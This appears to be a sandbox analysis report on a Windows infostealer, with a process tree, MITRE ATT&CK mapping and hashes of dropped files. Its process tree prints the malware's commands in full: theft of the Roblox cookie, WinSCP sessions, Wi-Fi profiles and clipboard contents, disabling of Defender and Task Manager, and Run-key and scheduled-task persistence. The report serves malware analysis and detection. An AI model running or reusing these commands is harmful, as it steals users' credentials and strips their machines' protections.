- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
  2⤵
  PID:10136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "function Get-AntiVirusProduct {
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:10432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:6908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:10624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
  2⤵
  PID:8024
- - C:\Windows\system32\netsh.exe
    netsh wlan show profile
    3⤵
    PID:10020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
  2⤵
  PID:5264
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
    3⤵
    PID:5904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:6684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:10652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:10364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:8772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Failed' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
  2⤵
  PID:10244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6052
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:5352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
  2⤵
  PID:8140
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:10316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
  2⤵
  PID:10312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_Q9zRra /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Q9zRra.vbs /f"
  2⤵
  PID:9232
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_Q9zRra /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Q9zRra.vbs /f
    3⤵
    - Adds Run key to start application
    PID:5996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Q9zRra.vbs\"""
  2⤵
  PID:7604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Q9zRra.vbs\""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5524
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Q9zRra.vbs
      4⤵
      Views/modifies file attributes
      PID:10516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutABjdw.ps1" -RunAsAdministrator"
  2⤵
  PID:6812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutABjdw.ps1" -RunAsAdministrator
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:8620
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2872 --field-trial-handle=1740,i,3751571324849698368,13792513845905616171,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:9860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3112 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
1⤵
PID:780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

Filesize
43KB

MD5
252b4fda07550496d330d819f15ceb3e

SHA1
650584312b310219a26d5fc20cb1804bb6c4dde5

SHA256
39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d

SHA512
a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8d460ce715a00afd56cda62e926b8b17

SHA1
3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22

SHA256
195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb

SHA512
1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0603766fa888acdacef8ec5361a9d560

SHA1
beb1e816a661f636a0725d232ad218b594f8e51b

SHA256
72f75bc1ed18894d923c9c67838cf7abdb34951057ac8d1cd7ef3b20a6af0692

SHA512
761abc3fb928cb3a4c0d03940bd16ee94d37955755f6ee4f85c6259a1b67cf1a3a8b26ffa82beb4c91c03f0a1837ad2753e560ad8a4058359a1d7773045a7922

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
855B

MD5
a7b8dee5db8feed27aba4f304ed40c86

SHA1
acaedb3356fa771794d97142079d550fff007840

SHA256
78b2318a2c96ce28215a261e8245f371ca5eff96eef77c95288a9f59acc841a1

SHA512
6226bd9ba227a0d52c7ce3e3a88dd9af2dbee4ba6e3fe7e93b341547e89355ef7b2b0692167ccf73e3c1317e35f2382f15fa95f3da6368629d4b99decd07baa7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0c41381badd1e816a1215053819ea50

SHA1
77d97abe968fd0669b474fadd3e9147034375c72

SHA256
11c384853728cdca76137406a30cfc18bad03b46e8babc305b83f7ce4cd8ed94

SHA512
938b28aad2aff147592b4772ec462cd148519e91c21ed0912eaf084b196351e9f247720a0a5745803d5467243a7ec29a013c0a3c3aff391c220056d9a979ec3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
0c66a5c3f230a565b2a8a49bffc1bee0

SHA1
bf440054e8ae6d44ee03de636fbf812eae0022db

SHA256
38883c0753d0b127f826d35501f066d53eb7e34f878015e28270d8a538c9042d

SHA512
127084168d50192934d739b9b8d41901178f4491fa92a0e4d9cad07db788318404391bc80b68340d9788bead40131b53bad8b3b29a737059cd819ce2ea1d5011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
4b6f456486ff0d79c91c867f0329210b

SHA1
94563e7275d08e50753e93e72279f1c99a113247

SHA256
fcc8493195e0fd297b828b7ec71e77f60eac5064f085c1a03de157067d1e89ff

SHA512
7355e96216756d7119cfb5f3e0739e7f76c02e4a63b7aa9d37707e940018f9d1e1a8b96e5aaac541031aae374613634c818726a4a803522507ce6d9f237416dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\2c9549cd-8fd7-4006-8607-308588d3920f.tmp.node

Filesize
1.4MB

MD5
56192831a7f808874207ba593f464415

SHA1
e0c18c72a62692d856da1f8988b0bc9c8088d2aa

SHA256
6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

SHA512
c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_89.zip

Filesize
2KB

MD5
0891e57b189956f9b1c2fd3f2e7d92df

SHA1
df431d92b81f3982a29c0e9c34050ba1049b25b8

SHA256
e7002caa07b8f34b25949d06be7f45b6df535ea07013ea0451063a45ccd87ae1

SHA512
19afe7d50c99cd25ef9ee5d4219c157a2333353b21826bb218085eee0d14729469ef233c41428a6c87df40bf6899f74647c9fd99d3bcc71f76eb3e06119539d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cy0fy5b1.v24.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f947033b-f4ab-463c-8c74-3a5bd3e78e79.tmp.node

Filesize
154KB

MD5
56c465754297ae8b4a4991d094af1833

SHA1
0695ed545b27842df51fa32d7ad03f6db661afe1

SHA256
9a02d4912fcc6c9195276e200afe8cb64f9f271101f54e24bcfb5519f7bb1e73

SHA512
44a3057df23f63ee58134cd064cdae0c3d4045787f5a589321346711a8778105407364595a6af984f2c82da974965ae1d29586176b70bcf634d55cd213c74509

Download Submit
C:\Users\Admin\AppData\Local\Temp\p8GmZ53VLsMO_tezmp.ps1

Filesize
728B

MD5
3c2f7de1af47a99cba00fd8afd84ca78

SHA1
405902a0109a309bd80593323638b684fc6b9c79

SHA256
77cfd8ef12d58c36e15fcce566f919ee88b7337e17f612794dc09cdbb342612f

SHA512
525902201dd6d6ae6aaa158dc4c8d520cde40439875b9d4857aa68573d9000827cd05cb14becaf0cb17ea786597414f5e0bc4608d1fe3eb2dfe30e77b9903fe7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Q9zRra.vbs

Filesize
4KB

MD5
e29f0690ba2d1162a4f2a4e9e3d962a1

SHA1
8e0f6e7d3437cba468e71f9adef9397d6e99b240

SHA256
77aa7c10b3570acc4b2e524f8df579cfb8cea63d2d47e3c86cbe7d3f06314c1f

SHA512
48c3af258e51d0ed21209a5bbb16c8556648f12088be01ecbb833c6e38eb4cfce2b724251157699fbca7a170f7672222b0d9689ddc5c8695f47228459f0092f7

Download Submit
C:\Users\Admin\AppData\Roaming\XLgcA2iauD7X.vbs

Filesize
139B

MD5
21e41722b065c94c5ddbca8ded939d7c

SHA1
1932cd73750a15bf821daa5a9755c230ff01e979

SHA256
e4de485769fe119786d78cf328979518ab7a4531cf05931d5cae980a50552c64

SHA512
1c9cdf8b9c44cbdf0b83f2ee84bb13d366352bb5f870159e760f880332edc9d6b65d2029a366708cd729e769e4394af547165ccc0829713c00f9e1e9f44eb6c5

Download Submit
C:\Users\Admin\AppData\Roaming\salutABjdw.ps1

Filesize
349B

MD5
28e4eda7451c625bbe806b745753f729

SHA1
d29e9b2c2ac5b10188cbae92cffba6827728543d

SHA256
da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba

SHA512
932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

Download Submit
memory/5124-375-0x0000026764930000-0x0000026764940000-memory.dmp

Filesize
64KB

Download
memory/5124-374-0x0000026764930000-0x0000026764940000-memory.dmp

Filesize
64KB

Download
memory/5124-377-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/5124-372-0x0000026764930000-0x0000026764940000-memory.dmp

Filesize
64KB

Download
memory/5124-368-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/5524-424-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/5524-416-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/6204-41-0x0000023932420000-0x0000023932430000-memory.dmp

Filesize
64KB

Download
memory/6204-40-0x00007FFED0730000-0x00007FFED11F1000-memory.dmp

Filesize
10.8MB

Download
memory/6204-56-0x00007FFED0730000-0x00007FFED11F1000-memory.dmp

Filesize
10.8MB

Download
memory/6204-53-0x0000023932420000-0x0000023932430000-memory.dmp

Filesize
64KB

Download
memory/6204-42-0x0000023932420000-0x0000023932430000-memory.dmp

Filesize
64KB

Download
memory/7292-333-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/7292-358-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/7784-344-0x000001F16EBC0000-0x000001F16EBD0000-memory.dmp

Filesize
64KB

Download
memory/7784-343-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/7784-346-0x000001F16EBC0000-0x000001F16EBD0000-memory.dmp

Filesize
64KB

Download
memory/7784-361-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/7784-357-0x000001F16EBC0000-0x000001F16EBD0000-memory.dmp

Filesize
64KB

Download
memory/7988-392-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/7988-387-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/7988-389-0x0000017FE8C50000-0x0000017FE8C60000-memory.dmp

Filesize
64KB

Download
memory/7988-390-0x0000017FE8C50000-0x0000017FE8C60000-memory.dmp

Filesize
64KB

Download
memory/8620-450-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/8620-462-0x0000014863220000-0x0000014863230000-memory.dmp

Filesize
64KB

Download
memory/8620-461-0x0000014863220000-0x0000014863230000-memory.dmp

Filesize
64KB

Download
memory/8620-466-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/8772-320-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/8772-308-0x0000011EFA810000-0x0000011EFA820000-memory.dmp

Filesize
64KB

Download
memory/8772-307-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/9024-405-0x0000019DC5740000-0x0000019DC5750000-memory.dmp

Filesize
64KB

Download
memory/9024-407-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/9024-404-0x0000019DC5740000-0x0000019DC5750000-memory.dmp

Filesize
64KB

Download
memory/9024-393-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/9124-234-0x000002866DEC0000-0x000002866DED0000-memory.dmp

Filesize
64KB

Download
memory/9124-230-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/9124-289-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/9124-231-0x000002866DEC0000-0x000002866DED0000-memory.dmp

Filesize
64KB

Download
memory/9860-511-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-512-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-523-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-521-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-522-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-519-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-520-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-517-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-518-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/9860-513-0x0000017BA2A60000-0x0000017BA2A61000-memory.dmp

Filesize
4KB

Download
memory/10432-221-0x0000026A9CAC0000-0x0000026A9CAD0000-memory.dmp

Filesize
64KB

Download
memory/10432-210-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/10432-282-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/10432-262-0x0000026A9CAC0000-0x0000026A9CAD0000-memory.dmp

Filesize
64KB

Download
memory/10432-220-0x0000026A9CAC0000-0x0000026A9CAD0000-memory.dmp

Filesize
64KB

Download
memory/10624-274-0x000001E6B12D0000-0x000001E6B12E0000-memory.dmp

Filesize
64KB

Download
memory/10624-284-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/10624-201-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/10624-206-0x000001E6B12D0000-0x000001E6B12E0000-memory.dmp

Filesize
64KB

Download
memory/10652-297-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/10652-305-0x00007FFED4C60000-0x00007FFED5721000-memory.dmp

Filesize
10.8MB

Download
memory/10652-303-0x0000022AFD220000-0x0000022AFD230000-memory.dmp

Filesize
64KB

Download
memory/12224-31-0x00007FFED0730000-0x00007FFED11F1000-memory.dmp

Filesize
10.8MB

Download
memory/12224-30-0x000002773DCB0000-0x000002773DCD2000-memory.dmp

Filesize
136KB

Download
memory/12224-32-0x000002773DA70000-0x000002773DA80000-memory.dmp

Filesize
64KB

Download
memory/12224-33-0x000002773DA70000-0x000002773DA80000-memory.dmp

Filesize
64KB

Download
memory/12224-37-0x00007FFED0730000-0x00007FFED11F1000-memory.dmp

Filesize
10.8MB

Download